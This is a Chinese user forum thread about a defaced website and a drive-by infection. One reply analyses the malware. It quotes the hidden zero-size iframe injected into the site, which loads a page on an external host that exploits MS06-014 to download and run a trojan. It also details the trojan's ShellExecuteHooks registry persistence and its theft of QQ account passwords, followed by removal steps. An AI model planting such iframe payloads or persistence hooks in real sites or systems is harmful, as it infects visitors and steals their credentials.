我一个朋友的网站被黑了。
上面是“我鄙视信息收费……”乱七八糟的。
我用百度搜索“我鄙视信息收费”打开一个网站，哎，我的电脑也中招了。网速马上变慢，
而且瑞星提示该网站有病毒，是Trojan什么的。不知我的电脑是不是中招了。瑞星也没有提示杀毒之类的话。
请各高手指点指点。







   
您的查询字词都已标明如下：我鄙视信息收费  (点击查询词，可以跳到它在文中首次出现的位置)
如果您想保存该页面，可以添加到搜藏
(百度和网页http://www.rhtec.net/的作者无关，不对其内容负责。百度快照谨为网络故障时之索引，不代表被搜索网站的即时页面。) 

--------------------------------------------------------------------------------

網絡執法官警示：贵站已被测试，存在严重漏洞！不測不知道，一測嚇我一跳，貴站你“露點”不少~謌謌==網絡執法官。

我鄙視信息收費，支持文件共享！因為我是窮人沒有學習機會！我鄙視冒牌駭客，打擊網絡騙子！因為他們一事無成自以為是！
我鄙視色情信息，將數據徹底刪毀！因為它玷汚了潔淨的天空！
雖然黑暗、孤寂在侵蝕我的世界，但Hacker精神，我還是畢生追求....

為提高國內互聯網安全系數，此次對貴站進行安全測試，還未使用任何攻擊手段，數據庫文件完好無損，請與網絡執法官聯系，獲取貴站的漏洞信息。QQ:2721335
網絡執法官致

高手多，帮忙的倒挺少的。
瑞星的网管到哪里去了？

很显然，该站被黑，还挂了马。
黑客留言就不说了，楼主都看到了，另外还有楼主没看到的：
http://www.rhtec.net/下方被加入：
<iframe src="http://www.6506500.com/mm/pop.htm" width="0" height="0" frameborder="0"></iframe>
http://www.6506500.com/mm/pop.htm利用MS06-014漏洞，下载http://www.6506500.com/mm/wj.exe到本机临时文件夹，命名为Ding.com并运行。

http://www.6506500.com/mm/wj.exe简要分析：

UPX加壳，写字板图标，瑞星报毒Trojan.PSW.Liumazi.ki

主要动作：

创建文件：
C:\Program Files\Internet Explorer\Connection Wizard\isignup.dll
C:\Program Files\Internet Explorer\Connection Wizard\isignup.sys

注册表启动项：
[HKEY_CLASSES_ROOT\CLSID\{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}]
InProcServer32值指向C:\Program Files\Internet Explorer\Connection Wizard\isignup.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}"=""
通过此shellexecutehooks加载isignup.dll并插入之后启动的所有应用程序进程。
后台连接网络，获得用户QQ的有关信息，与帐号密码一起发送出去。

手工查杀方法：
删除注册表启动项，重启后删除文件。如遇注册表守护，则用killbox的delete on reboot功能删除文件，重启后再删除注册表启动项。

谢谢.